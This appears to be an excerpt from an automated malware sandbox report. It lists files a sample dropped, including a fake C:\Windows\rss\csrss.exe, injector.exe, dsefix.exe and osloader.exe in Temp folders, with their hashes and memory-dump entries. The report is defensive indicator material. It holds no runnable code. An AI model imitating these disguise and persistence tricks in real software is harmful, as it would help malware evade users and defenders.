SHA256 bf083fe0dc8ed4bd65e2ab7cc75e784032c5e1096114f86aff26a0f110021d84
SHA512 7bbdf7380d4b3855129034779c246dded3b9d901b12154a861de68b493ee9b67e339fd34bbe826fab7dd9fe769746719483cee4ae707edbdbce298439479bfef

memory/2592-21-0x0000000002600000-0x0000000002A3C000-memory.dmp

memory/1936-20-0x0000000002790000-0x0000000002BCC000-memory.dmp

\Windows\rss\csrss.exe

MD5 0702e4dae1036aeca11ea6cda0f43983
SHA1 f52452a199a5ac99aa20ff0bdae0278885db5238
SHA256 40fd64492d67489f1ffb1c8d746c97befc2a386b3735e9a5fc87bf1c2e039a72
SHA512 35e38a13cee9f37f74bc5fffcf1696e85c32020e988b113cc91b3c7a5984efeeb777cdc7cf00db2b7c5a1615e67392e7d93ae960d32fcb6916f3e02e4930e4d6

\Windows\rss\csrss.exe

MD5 e20ed4d84ff2f50280cb53557f5f380f
SHA1 beffea89fe45ee55b0fadfbc30d169c6e0a43ac8
SHA256 aeab5f0f8f28781d1d127c4c74d04b6296c8c216f56123a9403a756416a597b7
SHA512 b97408545cfb2d2d34c28433d1b119a828188da928682b684e23b055f0a5eca8350c4994099d054946f031782fb35a3ea7622c3947b1972154f6021460133af3

memory/1936-22-0x0000000002790000-0x0000000002BCC000-memory.dmp

C:\Windows\rss\csrss.exe

MD5 9f3bd111c10107f3ec04035035562988
SHA1 55503c2bc0345ca1d1e23ff7ec3e2339a2882639
SHA256 946e45ef4dc4dabb4e1221603d2c974229840b20d3fd702de822715e56c92b12
SHA512 5c257eb493ff23193a610ad6188c6661a72e02c533fb040ae1213b7e229cbbc3a4c2e9d65863812ae539a48a42b4d04eb6b31064825c0d56523636d67c99c6a8

memory/1936-24-0x0000000000400000-0x0000000000D41000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe

MD5 f8e1e983c976b0068af60fbae41ecace
SHA1 7b706e53b1c19988d5b6f8526ca53843a00b2b6a
SHA256 40c23089e4ee7dd8c0c3722696ae0c555a090ad1e54aead41fd9474845f52bb6
SHA512 9b78f5d9b9b80b8eb6205d9cb39d98d7ed7d7b9b3f9d36ffc8394667d9b785f9cbbc65053af6c016817f7b10a528acf37f7a730d1d234a8f316a4eef19990253

C:\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

MD5 bf24d123c6fe6ab8c5bf88e917b71f67
SHA1 b9c506236a8f7afbea7abc99c81db22b84cefbe3
SHA256 3749921a4bae4003a127275a6cd9e82dc044a4755832fc7fd45bf1a991f05bd9
SHA512 2114db96eff691e15cda76f07324d78470a5f920618631aa044663c21450817e4e087e8a128d59220ceb4a83fef3a21615b3b1255308a0f65f9c1bf32f93f3fb

memory/1920-55-0x00000000007B0000-0x0000000000D98000-memory.dmp

\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

MD5 e9f3a7df4f843bca9f9cb8d853e550b2
SHA1 50481e7e45e42766eec1850e9217f0587ab226a8
SHA256 691d4605bb32c82fe11790d0b8155d0165630326af8c5084f80cdea630c1afd1
SHA512 846159a30999e5b21cdbbb862f76c5ea1d75cc3660b8f1e2b5894e6576d274ea5d3abf2a314cc8873df7f6c2bda84b35c44f437aefadff899e1a08091d0b7c15

\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

MD5 2229854319621b6052a5fa7fdf243fbe
SHA1 a3dc67a5fc09d204dbc21e637d18f2775d4c8dff
SHA256 79a5bc47fe774b141c7e8d72b5e1ba00199bc0eb6a99fb86a529b10e29867e78
SHA512 d16743b4a87fc5bc3d09d1b0ce4bf22473d15dda205eac39670ced992114169c46bbed5217c5d8827312d3096e09b6281d1f936c5000e837e6936c001c082027

\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

MD5 ed52b4accb4bfad91132c246bda61f20
SHA1 bbd5770e198401978a6df444457d4d9957a4d386
SHA256 fb5aea678d1d902d731d293897c794ba215cc1bc1934b13b9c77a4c00d409466
SHA512 56d217acfaae29dd11d730b87985a1ebb0dd210c5a715cbb1c32d63777ffece82de24abf96a06c1edcbd7f9963f4e4c6b1103314a332a004c0a4c595ddee8de5

memory/1920-46-0x00000000005A0000-0x0000000000B88000-memory.dmp

\Users\Admin\AppData\Local\Temp\symsrv.dll

MD5 ad01f3fbe7748d25b16dbdebbdf98b2a
SHA1 5e9c45fc1c90153b102b988f80b1859dc476a48d
SHA256 f3abfa9ee62e62c17c247264eec812cedd6da98eb2c58aa38767f03fd526c348
SHA512 d887afa6e53f29ab4210b32f4fc331605c41a14debd6d2c754f37566f2c4f38afc793502996ca77308c8d427c923448de7fc85599a54d74404615e057c4f4123

\Users\Admin\AppData\Local\Temp\dbghelp.dll

MD5 aef05339187d23af2f408d883461af01
SHA1 d4c5d90bbb34c8a7a984716006984ecfa9419902
SHA256 c113a1509b935e6508019bfdc70ec65adfb10e452ad61590b09832d6a8d152fe
SHA512 0f59de7d4723a22dc15417eaadd41f9248d3b84cc61de2568d220cab6658d32c4c53f199594c686bf8b27c7eaa9252b4f98699ebb744a34341081f4a6c63de76

\Users\Admin\AppData\Local\Temp\csrss\patch.exe

MD5 34930f30b5be3bd8eefed8fe7ad09c7f
SHA1 e9695004f134c7d1af233a5a79048d610c5f7379
SHA256 7f447f392795a8301c1be1103283c892160f21fdbe09e64728541dd4086e097e
SHA512 71ebad4bcf7ad8ed64e3ec0d9fc33fabec78ff09deacb79e62cde5b386db7a3d7a3da09a2be9781502ba801b3eb518fd576123550ec947becf530a0137ba862d

C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

MD5 ac05d27423a85adc1622c714f2cb6184
SHA1 b0fe2b1abddb97837ea0195be70ab2ff14d43198
SHA256 c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d
SHA512 6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

C:\Windows\Temp\Tar5009.tmp

MD5 9c0c641c06238516f27941aa1166d427
SHA1 64cd549fb8cf014fcd9312aa7a5b023847b6c977
SHA256 4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f
SHA512 936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06

C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357

MD5 a266bb7dcc38a562631361bbf61dd11b
SHA1 3b1efd3a66ea28b16697394703a72ca340a05bd5
SHA256 df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e
SHA512 0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc

C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 c044a8d4ecd73a077a57e92033826aa7
SHA1 7fb07d11a1d679a9cc18558c0069781b048f9174
SHA256 cc741b979ab92f7f7dbc30440ef6b2dabbb0d742bdb79d6bdf4ac0d09c78893f
SHA512 029b6356abc953a9916e120ccfa4eb3ccd911140b93ffef9442477006c747acf26ab5a6b4695918c021dd5467763c61890d30fe472fb6ef6b027de8dcbe0cffd

C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357

MD5 076fcc711b8e28e0d9a762c778bcd0c4
SHA1 a71e5a2871677b5da818c5079a33ade3285cd78d
SHA256 4a395ffd3314d569f83462c0876dd0ee30fed45c0edb5a280e05ad186cf180b5
SHA512 d670e3425d963590140e1fcec9fba3b9231fc65f3adbef2c381285bf603e86280f9e88c7c5fbbb51691891cd3fa11874da8c52f5785148153190d89379217b91

C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 884863266cf1aadddab6a8d40ea0a5cf
SHA1 2b56c255994c757a054a500397c8ce3238006d63
SHA256 ba2e3ffeb4710f079a4ad26ad1d387c71373faf1104a951be578e0074c6ab137
SHA512 338d15d1fe2449647342d4d9bbea4f840df28a6d9c19329e1f76f1b44a1144d04e1e837204d303286a2c6cdb02422ec81bce7587c7d90e6b04ac4c9331a027a1

memory/1936-236-0x0000000000400000-0x0000000000D41000-memory.dmp

memory/1936-237-0x0000000002790000-0x0000000002BCC000-memory.dmp

memory/1936-238-0x0000000000400000-0x0000000000D41000-memory.dmp

memory/1920-239-0x00000000005A0000-0x0000000000B88000-memory.dmp

memory/1936-240-0x0000000000400000-0x0000000000D41000-memory.dmp

memory/1936-244-0x0000000000400000-0x0000000000D41000-memory.dmp

memory/1936-245-0x0000000000400000-0x0000000000D41000-memory.dmp

memory/1936-246-0x0000000000400000-0x0000000000D41000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\AAF33CF37E194E98957768CF9C02DE8E2\download.error

MD5 7ba4a9ad24fd0bd903324f0cba2ca500
SHA1 ad365648b9c3476e54258e7db9ed12d8464bf0f9
SHA256 bca123401d301363020d6a0b3b690ec598d25453913edbfefe1587ae839c5d32
SHA512 de2dbb868336eab9940b1422ed0c826ac2869ffc0001c626b13dded5c74ee7941a01f5d9e8307a7bc81ce71dcaf4ee5e560d176ef3039b6f4111f15f950a02e0

C:\Users\Admin\AppData\Local\Temp\osloader.exe

MD5 e2f68dc7fbd6e0bf031ca3809a739346
SHA1 9c35494898e65c8a62887f28e04c0359ab6f63f5
SHA256 b74cd24cef07f0226e7b777f7862943faee4cf288178b423d5344b0769dc15d4
SHA512 26256a12b5b8b3a40b34f18e081cdb45ea11845589c9d458a79385a4b8178f32164b417ddc9346fab8299bc6d4b9fedb620274c4edf9321424f37a2e2a6de579

\Users\Admin\AppData\Local\Temp\osloader.exe

MD5 326c6698775260256af4a4bde51bef12
SHA1 9935fb0c248f4b1441441a60d60b1012c17d7ba1
SHA256 3f8b2bd707246c95c38032c611c61c021a4e11cfb604a9396e836e176c55d504
SHA512 94e2e8ccbc46506d740021d91d89a63fc568c47b24cce73c3de7f687171ff0345336b5dda975966a5268b02e43d1d084493ec47b9700c36ba813492a743d97fa

C:\Users\Admin\AppData\Local\Temp\Symbols\winload_prod.pdb\768283CA443847FB8822F9DB1F36ECC51\download.error

MD5 5da3a881ef991e8010deed799f1a5aaf
SHA1 fea1acea7ed96d7c9788783781e90a2ea48c1a53
SHA256 f18fdb9e03546bfb98397bcb8378b505eaf4ac061749229a7ee92a1c3cf156e4
SHA512 24fbcb5353a3d51ee01f1de1bbb965f9e40e0d00e52c42713d446f12edceeb8d08b086a8687a6188decaa8f256899e24a06c424d8d73adaad910149a9c45ef09

C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe

MD5 d98e78fd57db58a11f880b45bb659767
SHA1 ab70c0d3bd9103c07632eeecee9f51d198ed0e76
SHA256 414035cc96d8bcc87ed173852a839ffbb45882a98c7a6f7b821e1668891deef0
SHA512 aafbd3eee102d0b682c4c854d69d50bac077e48f7f0dd8a5f913c6c73027aed7231d99fc9d716511759800da8c4f0f394b318821e9e47f6e62e436c8725a7831

C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 767924fcab7a4f512186a878d6e53b01
SHA1 71873fcf952e5b9420725966d97e24cab38657f4
SHA256 52ceecc9954dd985ad6e664c16f0826ee8a57e385e08a92e27189ace25cf755e
SHA512 2eb4edd9a4ce501cc008736cf291b983fb9e8f29c61d83a8afdbb93f2ecf1661bfcb99d7b2a3c3f3238138bb8ec472c1d7ae1847c2e5870acc6307f2095a0d67

memory/1936-299-0x0000000000400000-0x0000000000D41000-memory.dmp

\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

MD5 d98e33b66343e7c96158444127a117f6
SHA1 bb716c5509a2bf345c6c1152f6e3e1452d39d50d
SHA256 5de4e2b07a26102fe527606ce5da1d5a4b938967c9d380a3c5fe86e2e34aaaf1
SHA512 705275e4a1ba8205eb799a8cf1737bc8ba686925e52c9198a6060a7abeee65552a85b814ac494a4b975d496a63be285f19a6265550585f2fc85824c42d7efab5

memory/1936-329-0x0000000000400000-0x0000000000D41000-memory.dmp

memory/1936-330-0x0000000000400000-0x0000000000D41000-memory.dmp

memory/1936-331-0x0000000000400000-0x0000000000D41000-memory.dmp

memory/1936-332-0x0000000000400000-0x0000000000D41000-memory.dmp

memory/1936-357-0x0000000000400000-0x0000000000D41000-memory.dmp

memory/1936-358-0x0000000000400000-0x0000000000D41000-memory.dmp

memory/1936-359-0x0000000000400000-0x0000000000D41000-memory.dmp